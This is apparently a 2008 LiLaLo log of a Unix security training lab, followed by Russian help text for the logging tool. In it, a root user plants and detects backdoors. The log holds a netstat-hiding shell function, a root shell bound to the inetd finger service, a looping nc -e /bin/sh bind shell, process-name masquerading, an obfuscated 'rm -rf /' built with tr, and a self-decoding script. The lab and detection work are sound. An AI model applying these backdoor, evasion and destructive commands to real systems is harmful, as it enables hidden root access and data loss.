/l3/users/nt-ids-2008-09/syslog/root :1 :2 :3 :4 :5 :6 :7 :8 :9 :10 |
|
#netstat()
> { > netstat "$@" | grep -v :79 > } |
#netstat -np -Ainet -l | grep -v 127.0.0.1 | less
|
#kill %1
[1] Terminated netstat -np -Ainet -l | grep -v 127.0.0.1 | less |
#netstat() { /usr/bin/netstat "$@" | grep -v :79; }
|
#netstat() { /bin/netstat "$@" | grep -v :79; }
|
#netstat -np -Ainet -l | grep -v 127.0.0.1 | less
|
#chkrootkit
ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected ... chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... lo: not promisc and no packet sniffer sockets eth0: not promisc and no packet sniffer sockets eth1: PACKET SNIFFER(/sbin/dhclient3[14115]) Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... chklastlog: nothing deleted |
#chkrootkit | grep INFECTED
Checking `inetdconf'... INFECTED |
#chkrootkit -v | grep INFECTED
Usage: /usr/sbin/chkrootkit [options] [test ...] Options: -h show this help and exit -V show version information and exit -l show available tests and exit -d debug -q quiet mode -x expert mode -e exclude known false positive files/dirs, quoted, space separated, READ WARNING IN README -r dir use dir as the root directory -p dir1:dir2:dirN path for the external commands used by chkrootkit -n skip NFS mounted dirs |
#chkrootkit -x | grep INFECTED
INFECTED ^C |
#chkrootkit -x | less
|
#bg
[1]+ nc -e /bin/sh -l -p 3000 & |
#ssh user@192.168.15.3
l3-agent is already running: pid=93499; pidfile=/home/user/.lilalo/l3-agent.pid [user@fbsd3 ~]$ [user@fbsd3 ~]$ [user@fbsd3 ~]$ telnet 192.168.15.111 3000 Trying 192.168.15.111... Connected to esx111.unix.nt. Escape character is '^]'. id # uid=0(root) gid=0(root) groups=0(root) touch /tmp/ggg # ... ^C^] telnet> q Connection closed. [user@fbsd3 ~]$ telnet 192.168.15.111 3001 Trying 192.168.15.111... telnet: connect to address 192.168.15.111: Connection refused telnet: Unable to connect to remote host [user@fbsd3 ~]$ exit logout Connection to 192.168.15.3 closed. |
#man nc
|
#nohup sh -c 'while true; do nc -e /bin/sh -l -p 3000 ; done' &
[2] 25597 nohup: ignoring input and appending output to `nohup.out' |
#ssh user@192.168.15.3
l3-agent is already running: pid=93499; pidfile=/home/user/.lilalo/l3-agent.pid [user@fbsd3 ~]$ telnet 192.168.15.111 3000 Trying 192.168.15.111... Connected to esx111.unix.nt. Escape character is '^]'. id # uid=0(root) gid=0(root) groups=0(root) exit ^] telnet> q ... 64 bytes from ya.ru (213.180.204.8): icmp_seq=3 ttl=55 time=77.7 ms --- ya.ru ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2005ms rtt min/avg/max/mdev = 34.633/49.732/77.733/19.821 ms ^] telnet> q Connection closed. [user@fbsd3 ~]$ exit logout Connection to 192.168.15.3 closed. |
#vi /etc/inetd.conf
--- /tmp/l3-saved-18306.3803.3128 2008-09-03 15:29:43.000000000 +0000 +++ /etc/inetd.conf 2008-09-03 15:29:48.000000000 +0000 @@ -19,7 +19,7 @@ #daytime stream tcp nowait root internal #time stream tcp nowait root internal -finger stream tcp nowait root /bin/sh sh -i +#finger stream tcp nowait root /bin/sh sh -i #:STANDARD: These are standard services. |
#chkrootkit
ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected ... chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... lo: not promisc and no packet sniffer sockets eth0: not promisc and no packet sniffer sockets eth1: PACKET SNIFFER(/sbin/dhclient3[14115]) Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... chklastlog: nothing deleted |
#chkrootkit | grep not
Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected ... Checking `lkm'... chkproc: nothing detected chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... lo: not promisc and no packet sniffer sockets eth0: not promisc and no packet sniffer sockets Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... chklastlog: nothing deleted |
#chkrootkit | grep INF
|
#netstat -np
unix 3 [ ] STREAM CONNECTED 48890 23460/gnome-power-m unix 3 [ ] STREAM CONNECTED 48882 23381/nm-applet /tmp/orbit-user/linc-5b55-0-4f818d5b5ce50 unix 3 [ ] STREAM CONNECTED 48881 20592/gconfd-2 unix 3 [ ] STREAM CONNECTED 48874 10980/X /tmp/.X11-unix/X0 unix 3 [ ] STREAM CONNECTED 48873 23460/gnome-power-m unix 3 [ ] STREAM CONNECTED 48878 20592/gconfd-2 /tmp/orbit-user/linc-5070-0-660fb4a047575 unix 3 [ ] STREAM CONNECTED 48741 23381/nm-applet unix 3 [ ] STREAM CONNECTED 48737 10980/X /tmp/.X11-unix/X0 unix 3 [ ] STREAM CONNECTED 48736 23381/nm-applet unix 3 [ ] STREAM CONNECTED 48732 2363/dbus-daemon /var/run/dbus/system_bus_socket ... unix 3 [ ] STREAM CONNECTED 18410 8879/dhcdbd unix 2 [ ] STREAM CONNECTED 18408 8879/dhcdbd unix 2 [ ] STREAM CONNECTED 11537 4974/logger unix 3 [ ] STREAM CONNECTED 6442 2363/dbus-daemon /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 6441 2739/avahi-daemon: unix 3 [ ] STREAM CONNECTED 6359 2742/avahi-daemon: unix 3 [ ] STREAM CONNECTED 6358 2739/avahi-daemon: unix 2 [ ] STREAM CONNECTED 6355 2739/avahi-daemon: unix 3 [ ] STREAM CONNECTED 5599 2363/dbus-daemon unix 3 [ ] STREAM CONNECTED 5598 2363/dbus-daemon |
#netstat -npl
Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:807 0.0.0.0:* LISTEN 8687/famd tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 4949/mysqld tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1929/portmap tcp 0 0 0.0.0.0:30001 0.0.0.0:* LISTEN 25565/nc tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3219/sshd tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6515/cupsd tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 25629/nc tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 8363/exim4 ... unix 2 [ ACC ] STREAM LISTENING 100508 16383/gnome-termina /tmp/orbit-user/linc-3fff-0-507f1b894ab4 unix 2 [ ACC ] STREAM LISTENING 20824 9920/hcid @/org/bluez/audio unix 2 [ ACC ] STREAM LISTENING 11548 4949/mysqld /var/run/mysqld/mysqld.sock unix 2 [ ACC ] STREAM LISTENING 23727 10980/X @/tmp/.X11-unix/X0 unix 2 [ ACC ] STREAM LISTENING 20792 9920/hcid /var/run/sdp unix 2 [ ACC ] STREAM LISTENING 22762 10926/gdm /var/run/gdm_socket unix 2 [ ACC ] STREAM LISTENING 14538 6515/cupsd /var/run/cups/cups.sock unix 2 [ ACC ] STREAM LISTENING 18678 8997/hald @/var/run/hald/dbus-LXu2EgfhWd unix 2 [ ACC ] STREAM LISTENING 6439 2739/avahi-daemon: /var/run/avahi-daemon/socket unix 2 [ ACC ] STREAM LISTENING 44148 21472/dbus-daemon @/tmp/dbus-wqAKif1OkQ |
#netstat -npl -A inet
Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:807 0.0.0.0:* LISTEN 8687/famd tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 4949/mysqld tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1929/portmap tcp 0 0 0.0.0.0:30001 0.0.0.0:* LISTEN 25565/nc tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3219/sshd tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6515/cupsd tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 25629/nc tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 8363/exim4 udp 0 0 0.0.0.0:514 0.0.0.0:* 12094/syslog-ng udp 0 0 0.0.0.0:514 0.0.0.0:* 12094/syslog-ng udp 0 0 0.0.0.0:68 0.0.0.0:* 14115/dhclient udp 0 0 0.0.0.0:5353 0.0.0.0:* 2739/avahi-daemon: udp 0 0 0.0.0.0:111 0.0.0.0:* 1929/portmap udp 0 0 0.0.0.0:631 0.0.0.0:* 6515/cupsd udp 0 0 0.0.0.0:50554 0.0.0.0:* 2739/avahi-daemon: |
#vi /tmp/myname.pl
--- /dev/null 2008-09-03 11:45:12.211695600 +0000 +++ /tmp/myname.pl 2008-09-03 15:31:05.000000000 +0000 @@ -0,0 +1,7 @@ +#!/usr/bin/perl + +$0='htttttp'; +while (<>) +{ +} + |
#chmod +x /tmp/myname.pl
|
#/tmp/myname.pl &
[3] 29433 [3]+ Stopped /tmp/myname.pl |
#ps
PID TTY TIME CMD 18306 pts/4 00:00:00 l3script 25546 pts/4 00:00:00 sh 25565 pts/4 00:00:00 nc 25597 pts/4 00:00:00 sh 25629 pts/4 00:00:00 nc 29433 pts/4 00:00:00 myname.pl 29448 pts/4 00:00:00 ps |
#netstat -lnp | less
|
#echo sn+-sg+: | tr b-za+: a-z\ /
rm -rf / |
#tr abc 123
ababababab 1212121212 |
#tr abc bcd
aaabbbbccc bbbccccddd |
#$(echo sn+-sg+: | tr b-za+: a-z\ /
|
#)
|
#vi script
--- /dev/null 2008-09-03 11:45:12.211695600 +0000 +++ script 2008-09-03 15:35:34.000000000 +0000 @@ -0,0 +1 @@ +echo hello |
#cat script
echo hello |
#cat script | tr a-z b-za
fdip ifmmp |
#cat script | tr a-z b-za > megascript
|
#vi megascript
--- /tmp/l3-saved-18306.5179.19881 2008-09-03 15:35:59.000000000 +0000 +++ megascript 2008-09-03 15:36:52.000000000 +0000 @@ -1 +1,3 @@ +#!/bin/sh +cat $0 | tr b-za a-z | grep -v 11111111 | grep -v^# | sh -s fdip ifmmp |
#chmod +x megascript
|
#./megascript
grep: invalid option -- ^ Usage: grep [OPTION]... PATTERN [FILE]... Try `grep --help' for more information. ./megascript: line 3: fdip: command not found |
#vi megascript
--- /tmp/l3-saved-18306.19375.31282 2008-09-03 15:37:02.000000000 +0000 +++ megascript 2008-09-03 15:37:07.000000000 +0000 @@ -1,3 +1,3 @@ #!/bin/sh -cat $0 | tr b-za a-z | grep -v 11111111 | grep -v^# | sh -s +cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^# | sh -s fdip ifmmp |
#./megascript
hello ./megascript: line 3: fdip: command not found |
#vi megascript
--- /tmp/l3-saved-18306.27113.7700 2008-09-03 15:37:13.000000000 +0000 +++ megascript 2008-09-03 15:37:21.000000000 +0000 @@ -1,3 +1,4 @@ #!/bin/sh cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^# | sh -s +exit #11111111111111 fdip ifmmp |
#./megascript
hello |
#cat ./megascript
#!/bin/sh cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^# | sh -s exit #11111111111111 fdip ifmmp |
#aide
aide aide.wrapper aideinit |
#aide
aide aide.wrapper aideinit |
#aideinit
Running aide --init... ^Z [4]+ Stopped aideinit |
#bg
[4]+ aideinit & |
#vi /etc/aide/aide.conf
|
#~
aide.conf aide.conf.d/ |
#vi /etc/aide/aide.conf.d/
|
#vi /etc/aide/aide.conf.d/31_aide_squid
|
#~
Size = s+b # Files that stay static InodeData = OwnerMode+n+i+Size StaticFile = m+c+Checksums # Directories that change their contents during system operation VarDir = OwnerMode+n+i # Logs are special: they are continously written to, may be compressed # have their file name changed in different, mutually incompatibly ways # and apprear and vanish at will. Handling this is a a complex and error- # Directories that change their contents during system operation VarDir = OwnerMode+n+i # While a live log is being written to, it doesn't change its 36,0-1 9% |
#vi /etc/aide/aide.conf.d/70_aide_tmp
|
#~
70_aide_dev 70_aide_proc_sys 70_aide_var 70_aide_etc 70_aide_tmp |
#vi /etc/aide/aide.conf.d/
|
#man aidde
|
#man aide
|
#ps aux | grep aide
root 29680 0.0 0.0 2572 1104 pts/4 S 15:41 0:00 /bin/sh /usr/sbin/aideinit root 29912 0.0 0.0 2556 1064 pts/4 S 15:41 0:00 /bin/sh /usr/bin/aide.wrapper --init root 30141 57.7 0.4 17272 16700 pts/4 R 15:41 3:10 /usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --init root 30280 0.0 0.0 1832 520 pts/4 R+ 15:47 0:00 grep aide |
#which yppaswd
|
#which yppasswd
|
#which ping6
/bin/ping6 |
#echo XXXXXX >> /bin/ping6
|
#ping6
Usage: ping6 [-LUdfnqrvVaA] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface] [-M mtu discovery hint] [-S sndbuf] [-F flow label] [-Q traffic class] [hop1 ...] destination |
#vi /etc/aide/aide.conf
|
#Files that stay static but are copied to a ram disk on startup
aide.conf.autogenerated aide.db.new |
#man aide
|
#exit
AIDE, version 0.13.1 ### AIDE database at /var/lib/aide/aide.db.new initialized. l3script: exi: command not found [4]- Done aideinit |
#ssh 192.168.15.3
Password: |
#ssh user@192.168.15.3
Path: /usr/ports/security/yafic Info: Yet Another File Integrity Checker, similar to Tripwire Maint: allan@saddi.com B-deps: gettext-0.16.1_3 gmake-3.81_2 libiconv-1.11_1 R-deps: WWW: http://philosophysw.com/software/yafic/ /usr/ports>exit exit [user@fbsd3 /usr/src/bin/ls]$ exit logout Connection to 192.168.15.3 closed. |
#ls /etc/aide/aide.conf.d/
10_aide_hostname 31_aide_ippl 10_aide_year 31_aide_lastlog 30_aide_apache2 31_aide_libapache2-mod-fastcgi 30_inn2_vars 31_aide_logrotate 31_aide_acpid 31_aide_lvm2 31_aide_adjtime 31_aide_mailman 31_aide_aide 31_aide_man 31_aide_amanda-client 31_aide_mlocate 31_aide_amanda-server 31_aide_modules 31_aide_amavisd-new 31_aide_mtab ... 31_aide_dovecot 31_aide_wtmp 31_aide_dpkg 31_aide_xfree86-common 31_aide_exim4 31_aide_xinetd 31_aide_exim4_logs 70_aide_dev 31_aide_findutils 70_aide_etc 31_aide_gpg 70_aide_proc_sys 31_aide_ifupdown 70_aide_tmp 31_aide_inetd 70_aide_var 31_aide_initscripts 99_aide_root 31_aide_inn2 |
#vi /etc/aide/aide.conf.d/70_aide_etc
|
#~
70_aide_dev 70_aide_proc_sys 70_aide_var 70_aide_etc 70_aide_tmp |
#dpkg -S /etc/aide/aide.conf.d/
10_aide_hostname 31_aide_ippl 10_aide_year 31_aide_lastlog 30_aide_apache2 31_aide_libapache2-mod-fastcgi 30_inn2_vars 31_aide_logrotate 31_aide_acpid 31_aide_lvm2 31_aide_adjtime 31_aide_mailman 31_aide_aide 31_aide_man 31_aide_amanda-client 31_aide_mlocate 31_aide_amanda-server 31_aide_modules 31_aide_amavisd-new 31_aide_mtab ... 31_aide_apt-listbugs 31_aide_openvpn 31_aide_apt-listchanges 31_aide_php4 31_aide_apt_frqchg 31_aide_php5 31_aide_apt_stable 31_aide_privoxy 31_aide_apt_unstable 31_aide_proftpd 31_aide_aptitude 31_aide_resolvconf 31_aide_aptitude_frqchg 31_aide_rngd 31_aide_bind9 31_aide_screen 31_aide_checksecurity 31_aide_slrn 31_aide_clamav 31_aide_smokeping |
#dpkg -S /etc/aide/aide.conf.d/31_aide_php5
dpkg: /etc/aide/aide.conf.d/31_aide_php5 not found. |
#ls /etc/logrotate.d/
apache2 cups exim4-paniclog scrollkeeper wpa_action apt dpkg mysql-server syslog-ng wpa_supplicant aptitude exim4-base rsyslog unattended-upgrades |
#dpkg -S /etc/logrotate.d/apache2
apache2.2-common: /etc/logrotate.d/apache2 |
#dpkg -S /etc/aide/aide.conf.d/31_aide_openvpn
dpkg: /etc/aide/aide.conf.d/31_aide_openvpn not found. |
#head /etc/aide/aide.conf
# AIDE conf # The daily cron job depends on these paths database=file:/var/lib/aide/aide.db database_out=file:/var/lib/aide/aide.db.new database_new=file:/var/lib/aide/aide.db.new gzip_dbout=yes # if you want to sacrifice security for speed, remove some of these # checksums. Whirlpool needs to be disabled on sparc and sparc64 |
#less /etc/crontab
|
#less /etc/cron.daily/
|
#ls /etc/cron.daily/
aide apt bsdmainutils exim4-base man-db apache2 aptitude chkrootkit logrotate standard |
#apt-cache search sshfs
sshfs - filesystem client based on SSH File Transfer Protocol |
#apt-cache search gmailfs
gmailfs - Use your GMail account as a filesystem |
#apt-get install gmailfs
Reading package lists... Done Building dependency tree Reading state information... Done The following extra packages will be installed: encfs fuse-utils libboost-serialization1.34.1 libfuse2 librlog1c2a python-clientform python-fuse python-libgmail python-mechanize The following NEW packages will be installed: encfs fuse-utils gmailfs libboost-serialization1.34.1 libfuse2 librlog1c2a python-clientform python-fuse python-libgmail python-mechanize 0 upgraded, 10 newly installed, 0 to remove and 0 not upgraded. ... creating fuse group... Adding group `fuse' (GID 118) ... Done. udev active, skipping device node creation. Setting up encfs (1.4.2-2) ... Setting up python-fuse (1:0.2-pre3-8) ... Setting up python-clientform (0.2.9-1) ... Setting up python-mechanize (0.1.7b-3) ... Setting up python-libgmail (0.1.10-3) ... Setting up gmailfs (0.8-5) ... |
#dpkg -L gmailfs
/. /sbin /usr /usr/bin /usr/bin/mount.gmailfs /usr/share /usr/share/pyshared /usr/share/pyshared/gmailfs.py /usr/share/pyshared-data /usr/share/pyshared-data/gmailfs ... /usr/share/doc/gmailfs/examples/tests.py.gz /usr/share/doc/gmailfs/NEWS.Debian.gz /usr/share/doc/gmailfs/changelog.Debian.gz /usr/share/man /usr/share/man/man8 /usr/share/man/man8/mount.gmailfs.8.gz /etc /etc/gmailfs /etc/gmailfs/gmailfs.conf /sbin/mount.gmailfs |
#less /usr/share/doc/gmailfs/README
|
#grep mount /usr/share/doc/gmailfs/README
the ability to enter your password when mounting instead of having to You can mount your Gmail filesystem either via fstab or on the command line using mount. In either case, the fuse module needs to be loaded prior to attempting to mount the Gmail filesystem. This module can be * To mount from the command line, do: mount.gmailfs none /mnt -o username=gmailuser@gmail.com,password=gmailpass,fsname=zOlRRa mount.gmailfs none /mnt -o username=gmailuser@gmail.com,fsname=zOlRRa -p 5MB. Files smaller than the minimum blocksize will only use the amount any files created during a previous mount with a different blocksize |
#nt mount.gmailfs none /mnt -o username=ttt191919@gmail.com,pas
|
#ls /mmount: according to mtab, python is already mounted on /mnt
Traceback (most recent call last): File "/usr/bin/mount.gmailfs", line 166, in <module> main(mountpoint, namedOptions, useEncfs) File "/usr/bin/mount.gmailfs", line 92, in main gmailfs.main(mountpoint, namedOptions) File "/usr/lib/python2.5/site-packages/gmailfs.py", line 1180, in main server.main() File "/usr/lib/python2.5/site-packages/fuse.py", line 713, in main main(**d) fuse.FuseError: filesystem initialization failed nt/ |
#umount /mnt
|
#ls /mnt
|
#umount /mnt
|
#less /usr/share/doc/gmailfs/README
|
#dd if=/dev/zero of=/mnt/30MB bs=1024k count=30
30+0 records in 30+0 records out 31457280 bytes (31 MB) copied, 79.3208 s, 397 kB/s |
#ls /mnt/
|
#ls -l /mnt/
total 0 |
#dd if=/dev/zero of=/mnt/f bs=1024k count=1
1+0 records in 1+0 records out 1048576 bytes (1.0 MB) copied, 0.579679 s, 1.8 MB/s |
#ls /mnt/
|
#!/bin/sh cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^# | sh -s exit #11111111111111 fdip ifmmp
echo hello
Время первой команды журнала | 18:21:17 2008- 9- 3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Время последней команды журнала | 19:26:36 2008- 9- 3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Количество командных строк в журнале | 101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Процент команд с ненулевым кодом завершения, % | 16.83 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Процент синтаксически неверно набранных команд, % | 2.97 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Суммарное время работы с терминалом *, час | 1.09 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Количество командных строк в единицу времени, команда/мин | 1.55 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Частота использования команд |
|
В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l bash: l: command not found |
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4 |
Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
$ find / -name abc find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C |
Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id uid=0(root) gid=0(root) Gruppen=0(root) |
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc
|
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc |
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.
Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
$ whoami
user
$ #^ Интересно, кто я?в журнале это будет выглядеть так:
$ whoami
user
Интересно, кто я? |
Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:
$ whoami
user
$ cat > /dev/null #^ Интересно, кто я?
Программа whoami выводит имя пользователя, под которым мы зарегистрировались в системе. - Она не может ответить на вопрос о нашем назначении в этом мире.В журнале это будет выглядеть так:
$ whoami user
|
Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=
1 2 3 4Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.
LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008